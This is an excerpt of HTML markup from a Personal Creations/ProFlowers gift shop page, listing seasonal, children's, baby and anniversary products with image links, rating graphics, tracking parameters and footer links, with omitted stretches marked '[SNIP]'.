owers/Dancing-Ghost-Figurine-30055810?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&amp;viewpos=1&amp;trackingpgroup=PHMPG01" style="height:174px;width:174px;"><img height="174px" width="174px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_000000011F48_0138343_W1_SQ?nanos=770&amp;qlt=75,0&amp;resMode=sharp&amp;op_usm=0.5,1.0,0.0,0&amp;wid=174&amp;hei=174" alt="Dancing Ghost Figurine" border="0" /></a>
...[SNIP]...
<div class="ReviewHolder">
           <img id="_ctl10_rptProductGroups__ctl0_productlist__ctl0__ctl0__ctl0__customerRating" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images//rating-0_0.gif" border="0" />
           <span id="_ctl10_rptProductGroups__ctl0_productlist__ctl0__ctl0__ctl0__numberOfCustomerReviews" class="SmallSize ReviewWrapper">
...[SNIP]...
ons.com/gifts/Small-Pumpkins-30020318?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&amp;viewpos=2&amp;trackingpgroup=PHMPG01" style="height:174px;width:174px;"><img height="174px" width="174px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0105447b?nanos=770&amp;qlt=75,0&amp;resMode=sharp&amp;op_usm=0.5,1.0,0.0,0&amp;wid=174&amp;hei=174" alt="Small Pumpkins" border="0" /></a>
...[SNIP]...
<div class="ReviewHolder">
           <img id="_ctl10_rptProductGroups__ctl0_productlist__ctl0__ctl1__ctl0__customerRating" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images//rating-5_0.gif" border="0" />
           <span id="_ctl10_rptProductGroups__ctl0_productlist__ctl0__ctl1__ctl0__numberOfCustomerReviews" class="SmallSize ReviewWrapper">
...[SNIP]...
/Halloween-Character-Doormat-30028425?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&amp;viewpos=3&amp;trackingpgroup=PHMPG01" style="height:174px;width:174px;"><img height="174px" width="174px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0057916b?nanos=770&amp;qlt=75,0&amp;resMode=sharp&amp;op_usm=0.5,1.0,0.0,0&amp;wid=174&amp;hei=174" alt="Halloween Character Doormat" border="0" /></a>
...[SNIP]...
<div class="ReviewHolder">
           <img id="_ctl10_rptProductGroups__ctl0_productlist__ctl0__ctl2__ctl0__customerRating" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images//rating-5_0.gif" border="0" />
           <span id="_ctl10_rptProductGroups__ctl0_productlist__ctl0__ctl2__ctl0__numberOfCustomerReviews" class="SmallSize ReviewWrapper">
...[SNIP]...
en-Baskets---FREE-Safety-Kit-30056233?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&amp;viewpos=4&amp;trackingpgroup=PHMPG01" style="height:174px;width:174px;"><img height="174px" width="174px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_0000011F111X_0138942_W1_SQ?nanos=770&amp;qlt=75,0&amp;resMode=sharp&amp;op_usm=0.5,1.0,0.0,0&amp;wid=174&amp;hei=174" alt="Leggy Halloween Baskets + FREE Safety Kit" border="0" /></a>
...[SNIP]...
<div class="ReviewHolder">
           <img id="_ctl10_rptProductGroups__ctl0_productlist__ctl0__ctl3__ctl0__customerRating" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images//rating-0_0.gif" border="0" />
           <span id="_ctl10_rptProductGroups__ctl0_productlist__ctl0__ctl3__ctl0__numberOfCustomerReviews" class="SmallSize ReviewWrapper">
...[SNIP]...
.com//House-of-Horrors-Slate-30030176?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&amp;viewpos=5&amp;trackingpgroup=PHMPG01" style="height:174px;width:174px;"><img height="174px" width="174px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0106998b?nanos=770&amp;qlt=75,0&amp;resMode=sharp&amp;op_usm=0.5,1.0,0.0,0&amp;wid=174&amp;hei=174" alt="House of Horrors Slate" border="0" /></a>
...[SNIP]...
<div class="ReviewHolder">
           <img id="_ctl10_rptProductGroups__ctl0_productlist__ctl0__ctl4__ctl0__customerRating" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images//rating-0_0.gif" border="0" />
           <span id="_ctl10_rptProductGroups__ctl0_productlist__ctl0__ctl4__ctl0__numberOfCustomerReviews" class="SmallSize ReviewWrapper">
...[SNIP]...
ns.com/gifts/Ornament-Canvas-30021167?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&amp;viewpos=1&amp;trackingpgroup=PHMPG02" style="height:174px;width:174px;"><img height="174px" width="174px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000007H355_69865_W2_SQ?nanos=770&amp;qlt=75,0&amp;resMode=sharp&amp;op_usm=0.5,1.0,0.0,0&amp;wid=174&amp;hei=174" alt="Ornament Canvas" border="0" /></a>
...[SNIP]...
<div class="ReviewHolder">
           <img id="_ctl10_rptProductGroups__ctl1_productlist__ctl0__ctl0__ctl0__customerRating" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images//rating-4_7.gif" border="0" />
           <span id="_ctl10_rptProductGroups__ctl1_productlist__ctl0__ctl0__ctl0__numberOfCustomerReviews" class="SmallSize ReviewWrapper">
...[SNIP]...
/gifts/Needlepoint-Stockings-30019422?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&amp;viewpos=2&amp;trackingpgroup=PHMPG02" style="height:174px;width:174px;"><img height="174px" width="174px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_0000009G125X_0090481_W2_SQ?nanos=770&amp;qlt=75,0&amp;resMode=sharp&amp;op_usm=0.5,1.0,0.0,0&amp;wid=174&amp;hei=174" alt="Vintage Handcrafted Needlepoint Stockings" border="0" /></a>
...[SNIP]...
<div class="ReviewHolder">
           <img id="_ctl10_rptProductGroups__ctl1_productlist__ctl0__ctl1__ctl0__customerRating" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images//rating-4_9.gif" border="0" />
           <span id="_ctl10_rptProductGroups__ctl1_productlist__ctl0__ctl1__ctl0__numberOfCustomerReviews" class="SmallSize ReviewWrapper">
...[SNIP]...
s/Snowman-and-Cardinal-Slate-30021291?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&amp;viewpos=3&amp;trackingpgroup=PHMPG02" style="height:174px;width:174px;"><img height="174px" width="174px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000008H203_82172_W1_SQ?nanos=770&amp;qlt=75,0&amp;resMode=sharp&amp;op_usm=0.5,1.0,0.0,0&amp;wid=174&amp;hei=174" alt="Snowman and Cardinal Slate" border="0" /></a>
...[SNIP]...
<div class="ReviewHolder">
           <img id="_ctl10_rptProductGroups__ctl1_productlist__ctl0__ctl2__ctl0__customerRating" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images//rating-4_9.gif" border="0" />
           <span id="_ctl10_rptProductGroups__ctl1_productlist__ctl0__ctl2__ctl0__numberOfCustomerReviews" class="SmallSize ReviewWrapper">
...[SNIP]...
/Winter-Wonderland-Stockings-30054670?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&amp;viewpos=4&amp;trackingpgroup=PHMPG02" style="height:174px;width:174px;"><img height="174px" width="174px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_0000011G242X_0136242_W1_SQ?nanos=770&amp;qlt=75,0&amp;resMode=sharp&amp;op_usm=0.5,1.0,0.0,0&amp;wid=174&amp;hei=174" alt="Winter Wonderland Stockings" border="0" /></a>
...[SNIP]...
<div class="ReviewHolder">
           <img id="_ctl10_rptProductGroups__ctl1_productlist__ctl0__ctl3__ctl0__customerRating" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images//rating-0_0.gif" border="0" />
           <span id="_ctl10_rptProductGroups__ctl1_productlist__ctl0__ctl3__ctl0__numberOfCustomerReviews" class="SmallSize ReviewWrapper">
...[SNIP]...
ts/Snowman-Cardinal-Doormats-30019054?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&amp;viewpos=5&amp;trackingpgroup=PHMPG02" style="height:174px;width:174px;"><img height="174px" width="174px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000008H201_82170_W2_SQ?nanos=770&amp;qlt=75,0&amp;resMode=sharp&amp;op_usm=0.5,1.0,0.0,0&amp;wid=174&amp;hei=174" alt="Snowman Cardinal Doormats" border="0" /></a>
...[SNIP]...
<div class="ReviewHolder">
           <img id="_ctl10_rptProductGroups__ctl1_productlist__ctl0__ctl4__ctl0__customerRating" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images//rating-4_6.gif" border="0" />
           <span id="_ctl10_rptProductGroups__ctl1_productlist__ctl0__ctl4__ctl0__numberOfCustomerReviews" class="SmallSize ReviewWrapper">
...[SNIP]...
ons.com/gifts/Kids-Backpacks-30015303?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&amp;viewpos=1&amp;trackingpgroup=PHMPG03" style="height:174px;width:174px;"><img height="174px" width="174px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_00000002352X_0049859_W1_SQ?nanos=770&amp;qlt=75,0&amp;resMode=sharp&amp;op_usm=0.5,1.0,0.0,0&amp;wid=174&amp;hei=174" alt="Kids&#39; Backpacks" border="0" /></a>
...[SNIP]...
<div class="ReviewHolder">
           <img id="_ctl10_rptProductGroups__ctl2_productlist__ctl0__ctl0__ctl0__customerRating" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images//rating-4_8.gif" border="0" />
           <span id="_ctl10_rptProductGroups__ctl2_productlist__ctl0__ctl0__ctl0__numberOfCustomerReviews" class="SmallSize ReviewWrapper">
...[SNIP]...
al-Youth-And-Toddler-Hoodies-30024319?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&amp;viewpos=2&amp;trackingpgroup=PHMPG03" style="height:174px;width:174px;"><img height="174px" width="174px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0073727b?nanos=770&amp;qlt=75,0&amp;resMode=sharp&amp;op_usm=0.5,1.0,0.0,0&amp;wid=174&amp;hei=174" alt="Embossed Initial Youth And Toddler Hoodies" border="0" /></a>
...[SNIP]...
<div class="ReviewHolder">
           <img id="_ctl10_rptProductGroups__ctl2_productlist__ctl0__ctl1__ctl0__customerRating" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images//rating-4_4.gif" border="0" />
           <span id="_ctl10_rptProductGroups__ctl2_productlist__ctl0__ctl1__ctl0__numberOfCustomerReviews" class="SmallSize ReviewWrapper">
...[SNIP]...
lStar-and-Butterfly-Nap-Mats-30054546?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&amp;viewpos=3&amp;trackingpgroup=PHMPG03" style="height:174px;width:174px;"><img height="174px" width="174px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_0000011G128X_0134102_W1_SQ?nanos=770&amp;qlt=75,0&amp;resMode=sharp&amp;op_usm=0.5,1.0,0.0,0&amp;wid=174&amp;hei=174" alt="All-Star and Butterfly Nap Mats" border="0" /></a>
...[SNIP]...
<div class="ReviewHolder">
           <img id="_ctl10_rptProductGroups__ctl2_productlist__ctl0__ctl2__ctl0__customerRating" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images//rating-0_0.gif" border="0" />
           <span id="_ctl10_rptProductGroups__ctl2_productlist__ctl0__ctl2__ctl0__numberOfCustomerReviews" class="SmallSize ReviewWrapper">
...[SNIP]...
.com/gifts/Rolling-Backpacks-30020599?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&amp;viewpos=4&amp;trackingpgroup=PHMPG03" style="height:174px;width:174px;"><img height="174px" width="174px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0105684b?nanos=770&amp;qlt=75,0&amp;resMode=sharp&amp;op_usm=0.5,1.0,0.0,0&amp;wid=174&amp;hei=174" alt="Rolling Backpacks" border="0" /></a>
...[SNIP]...
<div class="ReviewHolder">
           <img id="_ctl10_rptProductGroups__ctl2_productlist__ctl0__ctl3__ctl0__customerRating" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images//rating-3_7.gif" border="0" />
           <span id="_ctl10_rptProductGroups__ctl2_productlist__ctl0__ctl3__ctl0__numberOfCustomerReviews" class="SmallSize ReviewWrapper">
...[SNIP]...
ifts/Aluminum-Sports-Bottles-30019101?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&amp;viewpos=5&amp;trackingpgroup=PHMPG03" style="height:174px;width:174px;"><img height="174px" width="174px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_0000009A230X_85266_W1_SQ?nanos=770&amp;qlt=75,0&amp;resMode=sharp&amp;op_usm=0.5,1.0,0.0,0&amp;wid=174&amp;hei=174" alt="Aluminum Sports Bottles" border="0" /></a>
...[SNIP]...
<div class="ReviewHolder">
           <img id="_ctl10_rptProductGroups__ctl2_productlist__ctl0__ctl4__ctl0__customerRating" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images//rating-4_7.gif" border="0" />
           <span id="_ctl10_rptProductGroups__ctl2_productlist__ctl0__ctl4__ctl0__numberOfCustomerReviews" class="SmallSize ReviewWrapper">
...[SNIP]...
/Baby-Information-Art-Canvas-30047164?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&amp;viewpos=1&amp;trackingpgroup=PHMPG04" style="height:174px;width:174px;"><img height="174px" width="174px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_00000011A98X_114727_W1?nanos=770&amp;qlt=75,0&amp;resMode=sharp&amp;op_usm=0.5,1.0,0.0,0&amp;wid=174&amp;hei=174" alt="Baby Information Art Canvas" border="0" /></a>
...[SNIP]...
<div class="ReviewHolder">
           <img id="_ctl10_rptProductGroups__ctl3_productlist__ctl0__ctl0__ctl0__customerRating" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images//rating-4_8.gif" border="0" />
           <span id="_ctl10_rptProductGroups__ctl3_productlist__ctl0__ctl0__ctl0__numberOfCustomerReviews" class="SmallSize ReviewWrapper">
...[SNIP]...
gers--Ten-Toes-Picture-Frame-30021841?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&amp;viewpos=2&amp;trackingpgroup=PHMPG04" style="height:174px;width:174px;"><img height="174px" width="174px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000001016X_35172_W1?nanos=770&amp;qlt=75,0&amp;resMode=sharp&amp;op_usm=0.5,1.0,0.0,0&amp;wid=174&amp;hei=174" alt="Ten Fingers &amp; Ten Toes Picture Frame" border="0" /></a>
...[SNIP]...
<div class="ReviewHolder">
           <img id="_ctl10_rptProductGroups__ctl3_productlist__ctl0__ctl1__ctl0__customerRating" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images//rating-4_9.gif" border="0" />
           <span id="_ctl10_rptProductGroups__ctl3_productlist__ctl0__ctl1__ctl0__numberOfCustomerReviews" class="SmallSize ReviewWrapper">
...[SNIP]...
ns.com/gifts/Baby-Name-Frame-30015464?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&amp;viewpos=3&amp;trackingpgroup=PHMPG04" style="height:174px;width:174px;"><img height="174px" width="174px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0054242b?nanos=770&amp;qlt=75,0&amp;resMode=sharp&amp;op_usm=0.5,1.0,0.0,0&amp;wid=174&amp;hei=174" alt="Baby Name Frame" border="0" /></a>
...[SNIP]...
<div class="ReviewHolder">
           <img id="_ctl10_rptProductGroups__ctl3_productlist__ctl0__ctl2__ctl0__customerRating" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images//rating-4_6.gif" border="0" />
           <span id="_ctl10_rptProductGroups__ctl3_productlist__ctl0__ctl2__ctl0__numberOfCustomerReviews" class="SmallSize ReviewWrapper">
...[SNIP]...
olstered-Rocker-with-Ottoman-30017015?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&amp;viewpos=4&amp;trackingpgroup=PHMPG04" style="height:174px;width:174px;"><img height="174px" width="174px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0071881?nanos=770&amp;qlt=75,0&amp;resMode=sharp&amp;op_usm=0.5,1.0,0.0,0&amp;wid=174&amp;hei=174" alt="Upholstered Rocker with Ottoman" border="0" /></a>
...[SNIP]...
<div class="ReviewHolder">
           <img id="_ctl10_rptProductGroups__ctl3_productlist__ctl0__ctl3__ctl0__customerRating" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images//rating-4_8.gif" border="0" />
           <span id="_ctl10_rptProductGroups__ctl3_productlist__ctl0__ctl3__ctl0__numberOfCustomerReviews" class="SmallSize ReviewWrapper">
...[SNIP]...
om/gifts/Baby-Alphabet-Quilt-30016554?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&amp;viewpos=5&amp;trackingpgroup=PHMPG04" style="height:174px;width:174px;"><img height="174px" width="174px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000007G437_68702_W1_SQ?nanos=770&amp;qlt=75,0&amp;resMode=sharp&amp;op_usm=0.5,1.0,0.0,0&amp;wid=174&amp;hei=174" alt="Baby Alphabet Quilt" border="0" /></a>
...[SNIP]...
<div class="ReviewHolder">
           <img id="_ctl10_rptProductGroups__ctl3_productlist__ctl0__ctl4__ctl0__customerRating" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images//rating-4_5.gif" border="0" />
           <span id="_ctl10_rptProductGroups__ctl3_productlist__ctl0__ctl4__ctl0__numberOfCustomerReviews" class="SmallSize ReviewWrapper">
...[SNIP]...
s/Heart-in-Sand-Framed-Print-30021311?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&amp;viewpos=1&amp;trackingpgroup=PHMPG05" style="height:174px;width:174px;"><img height="174px" width="174px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/p0084749b?nanos=770&amp;qlt=75,0&amp;resMode=sharp&amp;op_usm=0.5,1.0,0.0,0&amp;wid=174&amp;hei=174" alt="Heart in Sand Framed Print" border="0" /></a>
...[SNIP]...
<div class="ReviewHolder">
           <img id="_ctl10_rptProductGroups__ctl4_productlist__ctl0__ctl0__ctl0__customerRating" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images//rating-4_7.gif" border="0" />
           <span id="_ctl10_rptProductGroups__ctl4_productlist__ctl0__ctl0__ctl0__numberOfCustomerReviews" class="SmallSize ReviewWrapper">
...[SNIP]...
ons.com/gifts/Tub-with-Stand-30021145?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&amp;viewpos=2&amp;trackingpgroup=PHMPG05" style="height:174px;width:174px;"><img height="174px" width="174px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_000000076432_66228_W1_SQ?nanos=770&amp;qlt=75,0&amp;resMode=sharp&amp;op_usm=0.5,1.0,0.0,0&amp;wid=174&amp;hei=174" alt="Galvanized Beverage Tub with Stand" border="0" /></a>
...[SNIP]...
<div class="ReviewHolder">
           <img id="_ctl10_rptProductGroups__ctl4_productlist__ctl0__ctl1__ctl0__customerRating" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images//rating-4_5.gif" border="0" />
           <span id="_ctl10_rptProductGroups__ctl4_productlist__ctl0__ctl1__ctl0__numberOfCustomerReviews" class="SmallSize ReviewWrapper">
...[SNIP]...
strial-Alphabet-Framed-Print-30019088?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&amp;viewpos=3&amp;trackingpgroup=PHMPG05" style="height:174px;width:174px;"><img height="174px" width="174px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_0000008G370X_85066_W7_SQ?nanos=770&amp;qlt=75,0&amp;resMode=sharp&amp;op_usm=0.5,1.0,0.0,0&amp;wid=174&amp;hei=174" alt="Architectural Alphabet Framed Print" border="0" /></a>
...[SNIP]...
<div class="ReviewHolder">
           <img id="_ctl10_rptProductGroups__ctl4_productlist__ctl0__ctl2__ctl0__customerRating" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images//rating-4_5.gif" border="0" />
           <span id="_ctl10_rptProductGroups__ctl4_productlist__ctl0__ctl2__ctl0__numberOfCustomerReviews" class="SmallSize ReviewWrapper">
...[SNIP]...
-Wedding--Anniversary-Afghan-30020974?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&amp;viewpos=4&amp;trackingpgroup=PHMPG05" style="height:174px;width:174px;"><img height="174px" width="174px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0026084b?nanos=770&amp;qlt=75,0&amp;resMode=sharp&amp;op_usm=0.5,1.0,0.0,0&amp;wid=174&amp;hei=174" alt="Heartwarming Wedding &amp; Anniversary Afghan" border="0" /></a>
...[SNIP]...
<div class="ReviewHolder">
           <img id="_ctl10_rptProductGroups__ctl4_productlist__ctl0__ctl3__ctl0__customerRating" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images//rating-4_7.gif" border="0" />
           <span id="_ctl10_rptProductGroups__ctl4_productlist__ctl0__ctl3__ctl0__numberOfCustomerReviews" class="SmallSize ReviewWrapper">
...[SNIP]...
ed-Photography-Framed-Prints-30019837?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&amp;viewpos=5&amp;trackingpgroup=PHMPG05" style="height:174px;width:174px;"><img height="174px" width="174px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000010D01X_103184_W1?nanos=770&amp;qlt=75,0&amp;resMode=sharp&amp;op_usm=0.5,1.0,0.0,0&amp;wid=174&amp;hei=174" alt="Wine Inspired Photography Framed Prints" border="0" /></a>
...[SNIP]...
<div class="ReviewHolder">
           <img id="_ctl10_rptProductGroups__ctl4_productlist__ctl0__ctl4__ctl0__customerRating" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images//rating-4_2.gif" border="0" />
           <span id="_ctl10_rptProductGroups__ctl4_productlist__ctl0__ctl4__ctl0__numberOfCustomerReviews" class="SmallSize ReviewWrapper">
...[SNIP]...
er Your Email Here
                   " id="_ctl11__ctl0_emailInput" class="textBox" onclick="javascript:this.value=&#39;&#39;;" onkeypress="return CaptureEnterInEmailEntry(footerClientID)" />
<img onclick="SetEmailEntryUrl()" src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/personalcreations/images/Go_Btn.gif" alt="Sign Up for Email Savings" border="0" />
</div>
...[SNIP]...
<a href="javascript:O_LC();" ><img src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/siteimages/sm_FFF_oo.gif" border="0" width="9" height="9" style="margin-left:5px;margin-top:-1px;vertical-align:middle;" title="site feedback"></a>
...[SNIP]...
<li><a rel="nofollow" href="https://accounts.proflowers.com/ManageOrderHistory.aspx?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&amp;cobrand=pcr">My Account</a>
...[SNIP]...
<li><a rel="nofollow" href="https://accounts.proflowers.com/ManageOrderHistory.aspx?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&amp;cobrand=pcr">Order Tracking</a>
...[SNIP]...
<li><a rel="nofollow" href="https://accounts.proflowers.com/ManageReminders.aspx?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&amp;cobrand=pcr">Reminder Service</a>
...[SNIP]...
<li><a border="0" href="http://www.providecommerce.com/Careers_Overview.aspx">Careers</a>
...[SNIP]...
<li><a border="0" href="http://www.providecommerce.com/privacy.aspx">Privacy & Security</a>
...[SNIP]...
<li><a border="0" href="http://www.providecommerce.com/terms.aspx">Terms Of Use</a>
...[SNIP]...
<li><a border="0" href="http://content.yudu.com/A1tfdc/PerCreation2011Fall2/resources/index.htm" target="_blank">View Catalog Online</a>
...[SNIP]...
<li><a href="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/PersonalCreations/images/PCR_ApparelSizeCharts.pdf" target="_blank">Apparel Size Charts</a>
...[SNIP]...
<li><a href="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/PersonalCreations/images/PCR_Ringsize.pdf" target="_blank">Ring Size Charts</a>
...[SNIP]...
</p>
<a title="The freshest flowers, guaranteed to last at least 7 days." border="0" rel="nofollow" href="http://www.proflowers.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme" style="height:35px;width:120px;"><img class="footerLogo_PFC" height=35px width=120px class="footerLogo_PFC" height="35px" width="120px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="The freshest flowers, guaranteed to last at least 7 days." border="0" /></a> <a title="A wide selection of green and exotic plants, perfect for gift and home d..cor." border="0" rel="nofollow" href="http://www.proplants.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme" style="height:35px;width:110px;"><img class="footerLogo_PLA" height=35px width=110px class="footerLogo_PLA" height="35px" width="110px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="A wide selection of green and exotic plants, perfect for gift and home d..cor." border="0" /></a> <a title="International flower delivery" border="0" rel="nofollow" href="http://www.proflowers.com/international?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme" style="height:35px;width:128px;"><img class="footerLogo_PFCint" height=35px width=128px class="footerLogo_PFCint" height="35px" width="128px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="International flower delivery" border="0" /></a>
<a title="The place for unique and personalized gifts." border="0" rel="nofollow" href="http://www.redenvelope.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme" style="height:35px;width:151px;"><img class="footerLogo_RED" height=35px width=151px class="footerLogo_RED" height="35px" width="151px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="The place for unique and personalized gifts." border="0" /></a>
<a title="Farm fresh fruit, gift baskets and delicious hand-made sweets." border="0" rel="nofollow" href="http://www.cherrymoonfarms.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme" style="height:35px;width:160px;"><img class="footerLogo_CMF" height=35px width=160px class="footerLogo_CMF" height="35px" width="160px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="Farm fresh fruit, gift baskets and delicious hand-made sweets." border="0" /></a>
...[SNIP]...
